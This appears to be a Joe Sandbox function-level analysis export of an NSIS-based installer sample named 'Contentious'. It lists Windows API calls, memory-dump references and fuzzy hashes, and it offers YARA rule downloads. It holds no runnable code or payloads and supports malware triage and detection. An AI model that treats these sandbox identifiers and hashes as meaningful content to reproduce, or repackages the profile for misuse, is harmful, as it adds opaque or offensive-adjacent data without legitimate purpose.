                                            Function 004027B5 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                            • GlobalFree.KERNEL32(00000000), ref: 00402877
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                            • String ID:
                                            • API String ID: 3294113728-0
                                            • Opcode ID: 343dad6e1d1f1acc39dc54fd2dbddba37a0f4f359c67a42cb200f436d1195532
                                            • Instruction ID: 0a6bca8ecd63676026edbfb1c3c3c77fca9f2a16f8acb5fc7edd4aca8780f57a
                                            • Opcode Fuzzy Hash: 343dad6e1d1f1acc39dc54fd2dbddba37a0f4f359c67a42cb200f436d1195532
                                            • Instruction Fuzzy Hash: F231C471C00118BBDF11AFA5CE49DAF7E79EF08364F24423AF910762D1C6795E418BA9
                                            Function 004050C1 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                            • lstrlenW.KERNEL32(004030DB,00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                            • lstrcatW.KERNEL32(00421690,004030DB), ref: 0040511C
                                            • SetWindowTextW.USER32(00421690,00421690), ref: 0040512E
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 8122bcf6a0149e6086bbb6e7fb337fef40a49940aa05a85ef971a36efe7fc915
                                            • Instruction ID: a155edcc61f39e61e19764dfe73df8d96dc604efb0d9904bed2a7f1a8b5b6fb0
                                            • Opcode Fuzzy Hash: 8122bcf6a0149e6086bbb6e7fb337fef40a49940aa05a85ef971a36efe7fc915
                                            • Instruction Fuzzy Hash: 96217C71D00558BBCB219FA5DD45ADFBFB9EF44350F10806AF944A62A0C6794A418F98
                                            Function 0040498B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004049A6
                                            • GetMessagePos.USER32 ref: 004049AE
                                            • ScreenToClient.USER32(?,?), ref: 004049C8
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004049DA
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404A00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                            • Instruction ID: 33ec571dbc4b5df47611d51f67fe054ec100feaa4e66978c3360ecba7af0637a
                                            • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                            • Instruction Fuzzy Hash: F9015271D00219BADB00DBA5DD45FFFBBBCAB54711F10416BBB10B61D0C7B4A6018B95
                                            Function 00402C7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                            • MulDiv.KERNEL32(?,00000064,?), ref: 00402CC8
                                            • wsprintfW.USER32 ref: 00402CD8
                                            • SetWindowTextW.USER32(?,?), ref: 00402CE8
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CFA
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402CD2
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e3e17eb3883613bd01c428ecb9c51c517a45ea2d1b7fee79cfc654e1c3b0f8d9
                                            • Instruction ID: 24f1e3b0c7db3a4d5467dde3e45a6c68f3834aeb0eb2857db4594cab4802523f
                                            • Opcode Fuzzy Hash: e3e17eb3883613bd01c428ecb9c51c517a45ea2d1b7fee79cfc654e1c3b0f8d9
                                            • Instruction Fuzzy Hash: 3C014471644248BFEF24AF60DD49BEE3B69FB00305F008439FA06A52D0DBB89954DF59
                                            Function 004060AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406110
                                            • CharNextW.USER32(?,?,?,00000000), ref: 0040611F
                                            • CharNextW.USER32(?,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406124
                                            • CharPrevW.USER32(?,?,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406137
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: *?|<>/":
                                            • API String ID: 589700163-165019052
                                            • Opcode ID: b7edfb63e30c9305099e6cc7fb0a64cc7777acb6978fb1fb85fc979881d03aaa
                                            • Instruction ID: 4a2c8b93f3f00ad1f037595bc6cc76d7c6216582d8143effd024cbcf063a8f89
                                            • Opcode Fuzzy Hash: b7edfb63e30c9305099e6cc7fb0a64cc7777acb6978fb1fb85fc979881d03aaa
                                            • Instruction Fuzzy Hash: 7B11B62684022295DB317B148C44AB7B6B8EF54790F56803FED96732C1E77C5CA286AD
                                            Function 004024EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(?,?,0040A568,000000FF,00409D68,00000400,?,?,00000021), ref: 0040252F
                                            • lstrlenA.KERNEL32(00409D68,?,?,0040A568,000000FF,00409D68,00000400,?,?,00000021), ref: 00402536
                                            • WriteFile.KERNEL32(00000000,?,00409D68,00000000,?,?,00000000,00000011), ref: 00402568
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                            • String ID: 8
                                            • API String ID: 1453599865-4194326291
                                            • Opcode ID: c626b69330e8d4113f8ae470d47427ea8bcabb27d685ee7f6299361e041b6526
                                            • Instruction ID: cff9808fb2b52db1cc78eea84bd95fecff25b82700627aa87d7ff40e926b01d0
                                            • Opcode Fuzzy Hash: c626b69330e8d4113f8ae470d47427ea8bcabb27d685ee7f6299361e041b6526
                                            • Instruction Fuzzy Hash: D6019271A44204FBD710AFB09E8AEAB7278EF50319F20443BB102B61D1D2BC4E41DA2D
                                            Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                                            • CompareFileTime.KERNEL32(-00000014,?,00409568,00409568,00000000,00000000,00409568,00435000,?,?,00000031), ref: 004017B8
                                              • Part of subcall function 00405E19: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281C0,NSIS Error), ref: 00405E26
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(004030DB,00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                              • Part of subcall function 004050C1: lstrcatW.KERNEL32(00421690,004030DB), ref: 0040511C
                                              • Part of subcall function 004050C1: SetWindowTextW.USER32(00421690,00421690), ref: 0040512E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID:
                                            • API String ID: 1941528284-0
                                            • Opcode ID: 4cad66ebb848725ed1f6a1d034bc965b8891958e9da99df43a26388d092c07e4
                                            • Instruction ID: fea904f2e10d271746d0f20908cdf77902a72bdc4a53de11320a400de1336617
                                            • Opcode Fuzzy Hash: 4cad66ebb848725ed1f6a1d034bc965b8891958e9da99df43a26388d092c07e4
                                            • Instruction Fuzzy Hash: 62417271900514BACF11BBB5CC46DEF7679EF05368F20823BF425B11E2D63C8A519AAE
                                            Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                            • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                            • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: 6ce800f2fb93d43145e75ed60dbe9ac83d8f3b4aa2f8eb12b3c3c44b6db942aa
                                            • Instruction ID: a46f1669fd62fcddf5759aea02b57c8eb471e7750102af69c7615fdbe320007b
                                            • Opcode Fuzzy Hash: 6ce800f2fb93d43145e75ed60dbe9ac83d8f3b4aa2f8eb12b3c3c44b6db942aa
                                            • Instruction Fuzzy Hash: 58116A31904008FEEF219F90DE89EAE3B79EB54348F100476FA05B00A0D3B59E52EA69
                                            Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 9a58a4b1b714bdeb85b36b7ac0f1695ca93221bcfe231717776fd1430c9ecfe4
                                            • Instruction ID: 1e99a2e3ee0d8cb2cc55cfcb97cc18e88a7bebe3fbcc68e996072587d9c1a701
                                            • Opcode Fuzzy Hash: 9a58a4b1b714bdeb85b36b7ac0f1695ca93221bcfe231717776fd1430c9ecfe4
                                            • Instruction Fuzzy Hash: 40F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B105466F601F5190C674AD018B35
                                            Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDC.USER32(?), ref: 00401D44
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                            • CreateFontIndirectW.GDI32(0040BD70), ref: 00401DBC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: 0725d893e94fd174977a651e1a0823bcd351703a6bab7c79127cf0e71ae22114
                                            • Instruction ID: c56ae0944857913282fa576ad39b26dea61a7ac65424af38da9408b7f1c95b65
                                            • Opcode Fuzzy Hash: 0725d893e94fd174977a651e1a0823bcd351703a6bab7c79127cf0e71ae22114
                                            • Instruction Fuzzy Hash: A5018631984245AFE7016BB0AE0EB9A7F74EB65306F144479F981B62E2C77810059B7E
                                            Function 0040487D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(004226B0,004226B0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 0040491E
                                            • wsprintfW.USER32 ref: 00404927
                                            • SetDlgItemTextW.USER32(?,004226B0), ref: 0040493A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 432158a3b12ceeb82141a1af4ebc204f328f8ec59d90b7a475c38da5306ce06a
                                            • Instruction ID: 30316ae283af339d029f00c0636502938e4caac6650f8f1893a4144cdcbf1ad5
                                            • Opcode Fuzzy Hash: 432158a3b12ceeb82141a1af4ebc204f328f8ec59d90b7a475c38da5306ce06a
                                            • Instruction Fuzzy Hash: E31127336041283BDB10666DDC46E9F328CEB81334F244637FA66F21D1E978CD1286E8
                                            Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: d2f1c536d3abec192f7672cd80b0fc65265ad12a1adfda56e42982a5398ff586
                                            • Instruction ID: 743da8294e509753cf54931ea2bb8f6bb49c191bc618b2a67718bc92c973a6dd
                                            • Opcode Fuzzy Hash: d2f1c536d3abec192f7672cd80b0fc65265ad12a1adfda56e42982a5398ff586
                                            • Instruction Fuzzy Hash: 76217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                            Function 00402331 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                            • lstrlenW.KERNEL32(0040A568,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                            • RegSetValueExW.ADVAPI32(?,?,?,?,0040A568,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                            • RegCloseKey.ADVAPI32(?,?,?,0040A568,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID:
                                            • API String ID: 1356686001-0
                                            • Opcode ID: 0fbadc1744dc08c75417c43921cc6175f7aa03adcc4a576a2966a08c4602771b
                                            • Instruction ID: dd6482d33bfca26aaa8e7f30057c56ab8fb8c99c6207a432b960756be4260044
                                            • Opcode Fuzzy Hash: 0fbadc1744dc08c75417c43921cc6175f7aa03adcc4a576a2966a08c4602771b
                                            • Instruction Fuzzy Hash: 441193B1A00108BEEB10EFA0DD49EAF777CEB50398F10403AF505B71D0D6B85D419B69
                                            Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040590F: CharNextW.USER32(?,?,00424EB8,?,00405983,00424EB8,00424EB8,00436800,?,74DF3420,004056C1,?,00436800,74DF3420,00434000), ref: 0040591D
                                              • Part of subcall function 0040590F: CharNextW.USER32(00000000), ref: 00405922
                                              • Part of subcall function 0040590F: CharNextW.USER32(00000000), ref: 0040593A
                                            • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                            • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                            • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                            • String ID:
                                            • API String ID: 3751793516-0
                                            • Opcode ID: 44f116f4e766c1ea5a0c7e5326277f725b8ca971dd80362c5bd7ad49ecf8ecba
                                            • Instruction ID: 262734717bc3bcf7a8c0ce33bb30a7f580439ac1f26dac51a327500c395ab635
                                            • Opcode Fuzzy Hash: 44f116f4e766c1ea5a0c7e5326277f725b8ca971dd80362c5bd7ad49ecf8ecba
                                            • Instruction Fuzzy Hash: 5411C671904104EBCF206FA0CD449AE77B1FF14369B34453BF881B61E1D23D49419A5D
                                            Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                            • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                            • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                              • Part of subcall function 00405D60: wsprintfW.USER32 ref: 00405D6D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                            • String ID:
                                            • API String ID: 1404258612-0
